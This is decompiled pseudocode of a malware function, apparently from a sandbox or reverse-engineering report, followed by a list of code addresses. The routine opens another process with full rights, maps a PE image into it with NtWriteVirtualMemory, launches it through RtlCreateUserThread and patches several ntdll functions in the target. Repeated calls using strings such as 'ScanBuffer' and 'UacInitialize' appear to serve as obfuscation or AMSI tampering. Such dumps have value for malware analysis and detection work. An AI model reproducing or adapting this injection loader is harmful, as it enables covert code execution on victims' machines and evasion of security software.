                                                                                                  				_t1394 = _t1395;
                                                                                                  				_t1095 = 0x57;
                                                                                                  				do {
                                                                                                  					_push(0);
                                                                                                  					_push(0);
                                                                                                  					_t1095 = _t1095 - 1;
                                                                                                  				} while (_t1095 != 0);
                                                                                                  				_t1392 = _a4;
                                                                                                  				_push(_t1394);
                                                                                                  				_push(0x2869992);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t1395;
                                                                                                  				E028544F4(0x28a63cc, 0x28699b0);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v16, E02854964(_v20));
                                                                                                  				_push(_v16);
                                                                                                  				E028547B0( &_v28,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v24, E02854964(_v28));
                                                                                                  				_pop(_t1151);
                                                                                                  				E02867B80(_v24, _t1151);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v32, E02854964(_v36));
                                                                                                  				_push(_v32);
                                                                                                  				E028547B0( &_v44,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v40, E02854964(_v44));
                                                                                                  				_pop(_t1156);
                                                                                                  				E02867B80(_v40, _t1156);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v48, E02854964(_v52));
                                                                                                  				_push(_v48);
                                                                                                  				E028547B0( &_v60,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v56, E02854964(_v60));
                                                                                                  				_pop(_t1161);
                                                                                                  				E02867B80(_v56, _t1161);
                                                                                                  				_v5 = 0;
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v64, E02854964(_v68));
                                                                                                  				_push(_v64);
                                                                                                  				E028547B0( &_v76,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v72, E02854964(_v76));
                                                                                                  				_pop(_t1166);
                                                                                                  				E02867B80(_v72, _t1166);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v80, E02854964(_v84));
                                                                                                  				_push(_v80);
                                                                                                  				E028547B0( &_v92,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v88, E02854964(_v92));
                                                                                                  				_pop(_t1171);
                                                                                                  				E02867B80(_v88, _t1171);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v96, E02854964(_v100));
                                                                                                  				_push(_v96);
                                                                                                  				E028547B0( &_v108,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v104, E02854964(_v108));
                                                                                                  				_pop(_t1176);
                                                                                                  				E02867B80(_v104, _t1176);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v112, E02854964(_v116));
                                                                                                  				_push(_v112);
                                                                                                  				E028547B0( &_v124,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v120, E02854964(_v124));
                                                                                                  				_pop(_t1181);
                                                                                                  				E02867B80(_v120, _t1181);
                                                                                                  				_t478 =  *0x28a2c1c; // 0x28a6324
                                                                                                  				E02867AF4(_t478, 0, 0, 0, 0);
                                                                                                  				_t480 =  *0x28a2df0; // 0x28a633c
                                                                                                  				 *_t480 = _a8;
                                                                                                  				_t481 =  *0x28a2df0; // 0x28a633c
                                                                                                  				 *((intOrPtr*)(_t481 + 4)) = 0;
                                                                                                  				 *0x28a6398 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtOpenProcess");
                                                                                                  				_t484 =  *0x28a2df0; // 0x28a633c
                                                                                                  				_t485 =  *0x28a2c1c; // 0x28a6324
                                                                                                  				 *0x28a6398(0x28a63c4, 0x1f0fff, _t485, _t484);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v128, E02854964(_v132));
                                                                                                  				_push(_v128);
                                                                                                  				E028547B0( &_v140,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v136, E02854964(_v140));
                                                                                                  				_pop(_t1189);
                                                                                                  				E02867B80(_v136, _t1189);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v144, E02854964(_v148));
                                                                                                  				_push(_v144);
                                                                                                  				E028547B0( &_v156,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v152, E02854964(_v156));
                                                                                                  				_pop(_t1194);
                                                                                                  				E02867B80(_v152, _t1194);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v160, E02854964(_v164));
                                                                                                  				_push(_v160);
                                                                                                  				E028547B0( &_v172,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v168, E02854964(_v172));
                                                                                                  				_pop(_t1199);
                                                                                                  				E02867B80(_v168, _t1199);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v176, E02854964(_v180));
                                                                                                  				_push(_v176);
                                                                                                  				E028547B0( &_v188,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v184, E02854964(_v188));
                                                                                                  				_pop(_t1204);
                                                                                                  				E02867B80(_v184, _t1204);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v192, E02854964(_v196));
                                                                                                  				_push(_v192);
                                                                                                  				E028547B0( &_v204,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v200, E02854964(_v204));
                                                                                                  				_pop(_t1209);
                                                                                                  				E02867B80(_v200, _t1209);
                                                                                                  				if( *0x28a63c4 == 0) {
                                                                                                  					L21:
                                                                                                  					_t557 =  *0x28a63c4; // 0x0
                                                                                                  					CloseHandle(_t557);
                                                                                                  					_pop(_t1210);
                                                                                                  					 *[fs:eax] = _t1210;
                                                                                                  					_push(0x2869999);
                                                                                                  					E028544C4( &_v700, 0x64);
                                                                                                  					return E028544C4( &_v300, 0x48);
                                                                                                  				}
                                                                                                  				_t565 =  *((intOrPtr*)( *_t1392))();
                                                                                                  				 *0x28a63b8 = E028679CC(GetCurrentProcess(), 0, _t565, 0x3000, 0x40);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v208, E02854964(_v212));
                                                                                                  				_push(_v208);
                                                                                                  				E028547B0( &_v220,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v216, E02854964(_v220));
                                                                                                  				_pop(_t1218);
                                                                                                  				E02867B80(_v216, _t1218);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v224, E02854964(_v228));
                                                                                                  				_push(_v224);
                                                                                                  				E028547B0( &_v236,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v232, E02854964(_v236));
                                                                                                  				_pop(_t1223);
                                                                                                  				E02867B80(_v232, _t1223);
                                                                                                  				_push(0x28699bc);
                                                                                                  				_push( *0x28a63cc);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v240, E02854964(_v244));
                                                                                                  				_push(_v240);
                                                                                                  				E028547B0( &_v252,  *0x28a63cc, 0x28699bc);
                                                                                                  				E02854698( &_v248, E02854964(_v252));
                                                                                                  				_pop(_t1228);
                                                                                                  				E02867B80(_v248, _t1228);
                                                                                                  				if( *0x28a63b8 == 0) {
                                                                                                  					goto L21;
                                                                                                  				}
                                                                                                  				E028658D8(_t1392, 0, 0);
                                                                                                  				 *((intOrPtr*)( *_t1392))();
                                                                                                  				 *((intOrPtr*)( *_t1392 + 0xc))();
                                                                                                  				_t1387 =  *0x28a63b8; // 0x0
                                                                                                  				if(IsBadReadPtr(_t1387, 0x40) != 0 ||  *_t1387 != 0x5a4d) {
                                                                                                  					L20:
                                                                                                  					_push( *((intOrPtr*)( *_t1392))(0x4000));
                                                                                                  					_t619 =  *0x28a63b8; // 0x0
                                                                                                  					_push(_t619);
                                                                                                  					_push(GetCurrentProcess());
                                                                                                  					L028679C4();
                                                                                                  					goto L21;
                                                                                                  				} else {
                                                                                                  					_v12 =  *((intOrPtr*)(_t1387 + 0x3c)) +  *0x28a63b8;
                                                                                                  					if(IsBadReadPtr(_v12, 0xf8) != 0 ||  *_v12 != 0x4550) {
                                                                                                  						goto L20;
                                                                                                  					} else {
                                                                                                  						 *0x28a63ac = _v12 + 0xf8;
                                                                                                  						 *0x28a63b4 =  *((intOrPtr*)(_v12 + 0x50));
                                                                                                  						if( *0x28a63b4 == 0) {
                                                                                                  							L19:
                                                                                                  							_push(0x4000);
                                                                                                  							_t630 =  *0x28a63b4; // 0x0
                                                                                                  							_push(_t630);
                                                                                                  							_t631 =  *0x28a63bc; // 0x0
                                                                                                  							_push(_t631);
                                                                                                  							_push(GetCurrentProcess());
                                                                                                  							L028679C4();
                                                                                                  							goto L20;
                                                                                                  						}
                                                                                                  						_t633 =  *0x28a63b4; // 0x0
                                                                                                  						 *0x28a63bc = E028679CC(GetCurrentProcess(), 0, _t633, 0x3000, 0x40);
                                                                                                  						_push(0x28699bc);
                                                                                                  						_push( *0x28a63cc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v256, E02854964(_v260));
                                                                                                  						_push(_v256);
                                                                                                  						E028547B0( &_v268,  *0x28a63cc, 0x28699bc);
                                                                                                  						E02854698( &_v264, E02854964(_v268));
                                                                                                  						_pop(_t1236);
                                                                                                  						E02867B80(_v264, _t1236);
                                                                                                  						_push(0x28699bc);
                                                                                                  						_push( *0x28a63cc);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v272, E02854964(_v276));
                                                                                                  						_push(_v272);
                                                                                                  						E028547B0( &_v284,  *0x28a63cc, 0x28699bc);
                                                                                                  						E02854698( &_v280, E02854964(_v284));
                                                                                                  						_pop(_t1241);
                                                                                                  						E02867B80(_v280, _t1241);
                                                                                                  						_push(0x28699bc);
                                                                                                  						_push( *0x28a63cc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v288, E02854964(_v292));
                                                                                                  						_push(_v288);
                                                                                                  						E028547B0( &_v300,  *0x28a63cc, 0x28699bc);
                                                                                                  						E02854698( &_v296, E02854964(_v300));
                                                                                                  						_pop(_t1246);
                                                                                                  						E02867B80(_v296, _t1246);
                                                                                                  						if( *0x28a63bc == 0) {
                                                                                                  							goto L19;
                                                                                                  						}
                                                                                                  						_t678 =  *0x28a63b4; // 0x0
                                                                                                  						_t679 =  *0x28a63c4; // 0x0
                                                                                                  						 *0x28a63c0 = E028679CC(_t679, 0, _t678, 0x3000, 0x40);
                                                                                                  						_push(0x28699bc);
                                                                                                  						_push( *0x28a63cc);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v304, E02854964(_v308));
                                                                                                  						_push(_v304);
                                                                                                  						E028547B0( &_v316,  *0x28a63cc, 0x28699bc);
                                                                                                  						E02854698( &_v312, E02854964(_v316));
                                                                                                  						_pop(_t1251);
                                                                                                  						E02867B80(_v312, _t1251);
                                                                                                  						_push(0x28699bc);
                                                                                                  						_push( *0x28a63cc);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v320, E02854964(_v324));
                                                                                                  						_push(_v320);
                                                                                                  						E028547B0( &_v332,  *0x28a63cc, 0x28699bc);
                                                                                                  						E02854698( &_v328, E02854964(_v332));
                                                                                                  						_pop(_t1256);
                                                                                                  						E02867B80(_v328, _t1256);
                                                                                                  						_push(0x28699bc);
                                                                                                  						_push( *0x28a63cc);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v336, E02854964(_v340));
                                                                                                  						_push(_v336);
                                                                                                  						E028547B0( &_v348,  *0x28a63cc, 0x28699bc);
                                                                                                  						E02854698( &_v344, E02854964(_v348));
                                                                                                  						_pop(_t1261);
                                                                                                  						E02867B80(_v344, _t1261);
                                                                                                  						if( *0x28a63c0 == 0) {
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v656, E02854964(_v660));
                                                                                                  							_push(_v656);
                                                                                                  							E028547B0( &_v668,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v664, E02854964(_v668));
                                                                                                  							_pop(_t1266);
                                                                                                  							E02867B80(_v664, _t1266);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v672, E02854964(_v676));
                                                                                                  							_push(_v672);
                                                                                                  							E028547B0( &_v684,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v680, E02854964(_v684));
                                                                                                  							_pop(_t1271);
                                                                                                  							E02867B80(_v680, _t1271);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v688, E02854964(_v692));
                                                                                                  							_push(_v688);
                                                                                                  							E028547B0( &_v700,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v696, E02854964(_v700));
                                                                                                  							_pop(_t1276);
                                                                                                  							E02867B80(_v696, _t1276);
                                                                                                  							_push(0x4000);
                                                                                                  							_t765 =  *0x28a63b4; // 0x0
                                                                                                  							_push(_t765);
                                                                                                  							_t766 =  *0x28a63c0; // 0x0
                                                                                                  							_push(_t766);
                                                                                                  							_t767 =  *0x28a63c4; // 0x0
                                                                                                  							_push(_t767);
                                                                                                  							L028679C4();
                                                                                                  							goto L19;
                                                                                                  						}
                                                                                                  						 *0x28a63b0 =  *(_v12 + 6) & 0x0000ffff;
                                                                                                  						_t770 =  *0x28a63ac; // 0x0
                                                                                                  						_t1277 =  *0x28a63b0; // 0x0
                                                                                                  						_t773 =  *0x28a63bc; // 0x0
                                                                                                  						RtlMoveMemory(_t773, _t1387, _t770 - _t1387 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + (_t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277) * 4);
                                                                                                  						_t1389 = ( *0x28a63b0 & 0x0000ffff) - 1;
                                                                                                  						if(_t1389 < 0) {
                                                                                                  							L14:
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacScan");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v352, E02854964(_v356));
                                                                                                  							_push(_v352);
                                                                                                  							E028547B0( &_v364,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v360, E02854964(_v364));
                                                                                                  							_pop(_t1286);
                                                                                                  							E02867B80(_v360, _t1286);
                                                                                                  							_t789 =  *((intOrPtr*)(_v12 + 0xa0));
                                                                                                  							if( *((intOrPtr*)(_v12 + 0xa0)) != 0) {
                                                                                                  								_t1384 =  *0x28a63c0; // 0x0
                                                                                                  								_t1079 =  *0x28a63bc; // 0x0
                                                                                                  								E02868110( *((intOrPtr*)(_v12 + 0x34)), _t1079, _t789 +  *0x28a63bc, _t1384,  *((intOrPtr*)(_v12 + 0xa4)));
                                                                                                  							}
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v368, E02854964(_v372));
                                                                                                  							_push(_v368);
                                                                                                  							E028547B0( &_v380,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v376, E02854964(_v380));
                                                                                                  							_pop(_t1291);
                                                                                                  							E02867B80(_v376, _t1291);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v384, E02854964(_v388));
                                                                                                  							_push(_v384);
                                                                                                  							E028547B0( &_v396,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v392, E02854964(_v396));
                                                                                                  							_pop(_t1296);
                                                                                                  							E02867B80(_v392, _t1296);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v400, E02854964(_v404));
                                                                                                  							_push(_v400);
                                                                                                  							E028547B0( &_v412,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v408, E02854964(_v412));
                                                                                                  							_pop(_t1301);
                                                                                                  							E02867B80(_v408, _t1301);
                                                                                                  							_t835 =  *0x28a63bc; // 0x0
                                                                                                  							E028681C0(_t835,  *((intOrPtr*)(_v12 + 0x80)) +  *0x28a63bc);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v416, E02854964(_v420));
                                                                                                  							_push(_v416);
                                                                                                  							E028547B0( &_v428,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v424, E02854964(_v428));
                                                                                                  							_pop(_t1306);
                                                                                                  							E02867B80(_v424, _t1306);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v432, E02854964(_v436));
                                                                                                  							_push(_v432);
                                                                                                  							E028547B0( &_v444,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v440, E02854964(_v444));
                                                                                                  							_pop(_t1311);
                                                                                                  							E02867B80(_v440, _t1311);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v448, E02854964(_v452));
                                                                                                  							_push(_v448);
                                                                                                  							E028547B0( &_v460,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v456, E02854964(_v460));
                                                                                                  							_pop(_t1316);
                                                                                                  							E02867B80(_v456, _t1316);
                                                                                                  							 *0x28a63a8 =  *((intOrPtr*)(_v12 + 0x28)) +  *0x28a63c0;
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v464, E02854964(_v468));
                                                                                                  							_push(_v464);
                                                                                                  							E028547B0( &_v476,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v472, E02854964(_v476));
                                                                                                  							_pop(_t1321);
                                                                                                  							E02867B80(_v472, _t1321);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v480, E02854964(_v484));
                                                                                                  							_push(_v480);
                                                                                                  							E028547B0( &_v492,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v488, E02854964(_v492));
                                                                                                  							_pop(_t1326);
                                                                                                  							E02867B80(_v488, _t1326);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v496, E02854964(_v500));
                                                                                                  							_push(_v496);
                                                                                                  							E028547B0( &_v508,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v504, E02854964(_v508));
                                                                                                  							_pop(_t1331);
                                                                                                  							E02867B80(_v504, _t1331);
                                                                                                  							_t925 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
                                                                                                  							_t1332 =  *0x28a2d0c; // 0x28a6320
                                                                                                  							 *_t1332 = _t925;
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v512, E02854964(_v516));
                                                                                                  							_push(_v512);
                                                                                                  							E028547B0( &_v524,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v520, E02854964(_v524));
                                                                                                  							_pop(_t1337);
                                                                                                  							E02867B80(_v520, _t1337);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v528, E02854964(_v532));
                                                                                                  							_push(_v528);
                                                                                                  							E028547B0( &_v540,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v536, E02854964(_v540));
                                                                                                  							_pop(_t1342);
                                                                                                  							E02867B80(_v536, _t1342);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v544, E02854964(_v548));
                                                                                                  							_push(_v544);
                                                                                                  							E028547B0( &_v556,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v552, E02854964(_v556));
                                                                                                  							_pop(_t1347);
                                                                                                  							E02867B80(_v552, _t1347);
                                                                                                  							_t968 =  *0x28a63c8; // 0x0
                                                                                                  							_t969 =  *0x28a63b4; // 0x0
                                                                                                  							_t970 =  *0x28a63bc; // 0x0
                                                                                                  							_t971 =  *0x28a63c0; // 0x0
                                                                                                  							_t972 =  *0x28a63c4; // 0x0
                                                                                                  							_t973 =  *0x28a2d0c; // 0x28a6320
                                                                                                  							 *( *_t973)(_t972, _t971, _t970, _t969, _t968);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v560, E02854964(_v564));
                                                                                                  							_push(_v560);
                                                                                                  							E028547B0( &_v572,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v568, E02854964(_v572));
                                                                                                  							_pop(_t1352);
                                                                                                  							E02867B80(_v568, _t1352);
                                                                                                  							_t991 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "RtlCreateUserThread");
                                                                                                  							_t1353 =  *0x28a2c8c; // 0x28a6314
                                                                                                  							 *_t1353 = _t991;
                                                                                                  							 *0x28a63a0 = 0;
                                                                                                  							 *0x28a63a4 = 0;
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v576, E02854964(_v580));
                                                                                                  							_push(_v576);
                                                                                                  							E028547B0( &_v588,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v584, E02854964(_v588));
                                                                                                  							_pop(_t1358);
                                                                                                  							E02867B80(_v584, _t1358);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanString");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v592, E02854964(_v596));
                                                                                                  							_push(_v592);
                                                                                                  							E028547B0( &_v604,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v600, E02854964(_v604));
                                                                                                  							_pop(_t1363);
                                                                                                  							E02867B80(_v600, _t1363);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v608, E02854964(_v612));
                                                                                                  							_push(_v608);
                                                                                                  							E028547B0( &_v620,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v616, E02854964(_v620));
                                                                                                  							_pop(_t1368);
                                                                                                  							E02867B80(_v616, _t1368);
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v624, E02854964(_v628));
                                                                                                  							_push(_v624);
                                                                                                  							E028547B0( &_v636,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v632, E02854964(_v636));
                                                                                                  							_pop(_t1373);
                                                                                                  							E02867B80(_v632, _t1373);
                                                                                                  							_t1050 =  *0x28a63a4; // 0x0
                                                                                                  							_t1051 =  *0x28a63a8; // 0x0
                                                                                                  							_t1052 =  *0x28a63c4; // 0x0
                                                                                                  							_t1053 =  *0x28a2c8c; // 0x28a6314
                                                                                                  							 *( *_t1053)(_t1052, 0, 0, 0, 0, 0, _t1051, 0, 0x28a63a0, _t1050);
                                                                                                  							_t1056 =  *0x28a63c4; // 0x0
                                                                                                  							E02867B24(_t1056, "NtOpenProcess");
                                                                                                  							_t1058 =  *0x28a63c4; // 0x0
                                                                                                  							E02867B24(_t1058, "NtReadVirtualMemory");
                                                                                                  							_t1060 =  *0x28a63c4; // 0x0
                                                                                                  							E02867B24(_t1060, "NtSetSecurityObject");
                                                                                                  							_push(0x28699bc);
                                                                                                  							_push( *0x28a63cc);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v640, E02854964(_v644));
                                                                                                  							_push(_v640);
                                                                                                  							E028547B0( &_v652,  *0x28a63cc, 0x28699bc);
                                                                                                  							E02854698( &_v648, E02854964(_v652));
                                                                                                  							_pop(_t1381);
                                                                                                  							E02867B80(_v648, _t1381);
                                                                                                  							if( *0x28a63a0 != 0) {
                                                                                                  								_v5 = 1;
                                                                                                  								_t1076 =  *0x28a63a0; // 0x0
                                                                                                  								CloseHandle(_t1076);
                                                                                                  							}
                                                                                                  							goto L19;
                                                                                                  						}
                                                                                                  						_t1390 = _t1389 + 1;
                                                                                                  						do {
                                                                                                  							_t1083 =  *0x28a63ac; // 0x0
                                                                                                  							_t1085 =  *0x28a63ac; // 0x0
                                                                                                  							_t1088 =  *0x28a63ac; // 0x0
                                                                                                  							RtlMoveMemory( *((intOrPtr*)(_t1088 + 0xc)) +  *0x28a63bc,  *((intOrPtr*)(_t1085 + 0x14)) +  *0x28a63b8,  *(_t1083 + 0x10));
                                                                                                  							_t1091 =  *0x28a63ac; // 0x0
                                                                                                  							 *0x28a63ac = _t1091 + 0x28;
                                                                                                  							_t1390 = _t1390 - 1;
                                                                                                  						} while (_t1390 != 0);
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}
                                                                                                  0x02868d58
                                                                                                  0x02868d63
                                                                                                  0x02868d64
                                                                                                  0x02868d70
                                                                                                  0x028697b1
                                                                                                  0x028697b6
                                                                                                  0x028697b8
                                                                                                  0x028697c8
                                                                                                  0x028697e0
                                                                                                  0x028697eb
                                                                                                  0x028697f9
                                                                                                  0x02869811
                                                                                                  0x0286981c
                                                                                                  0x0286981d
                                                                                                  0x02869822
                                                                                                  0x02869827
                                                                                                  0x02869829
                                                                                                  0x02869839
                                                                                                  0x02869851
                                                                                                  0x0286985c
                                                                                                  0x0286986a
                                                                                                  0x02869882
                                                                                                  0x0286988d
                                                                                                  0x0286988e
                                                                                                  0x02869893
                                                                                                  0x02869898
                                                                                                  0x0286989a
                                                                                                  0x028698aa
                                                                                                  0x028698c2
                                                                                                  0x028698cd
                                                                                                  0x028698db
                                                                                                  0x028698f3
                                                                                                  0x028698fe
                                                                                                  0x028698ff
                                                                                                  0x02869904
                                                                                                  0x02869909
                                                                                                  0x0286990e
                                                                                                  0x0286990f
                                                                                                  0x02869914
                                                                                                  0x02869915
                                                                                                  0x0286991a
                                                                                                  0x0286991b
                                                                                                  0x00000000
                                                                                                  0x0286991b
                                                                                                  0x02868d7d
                                                                                                  0x02868d82
                                                                                                  0x02868d89
                                                                                                  0x02868d9c
                                                                                                  0x02868da2
                                                                                                  0x02868dae
                                                                                                  0x02868db2
                                                                                                  0x02868df3
                                                                                                  0x02868df3
                                                                                                  0x02868df8
                                                                                                  0x02868dfa
                                                                                                  0x02868e0a
                                                                                                  0x02868e22
                                                                                                  0x02868e2d
                                                                                                  0x02868e3b
                                                                                                  0x02868e53
                                                                                                  0x02868e5e
                                                                                                  0x02868e5f
                                                                                                  0x02868e67
                                                                                                  0x02868e6f
                                                                                                  0x02868e7b
                                                                                                  0x02868e89
                                                                                                  0x02868e96
                                                                                                  0x02868e96
                                                                                                  0x02868e9b
                                                                                                  0x02868ea0
                                                                                                  0x02868ea2
                                                                                                  0x02868eb2
                                                                                                  0x02868eca
                                                                                                  0x02868ed5
                                                                                                  0x02868ee3
                                                                                                  0x02868efb
                                                                                                  0x02868f06
                                                                                                  0x02868f07
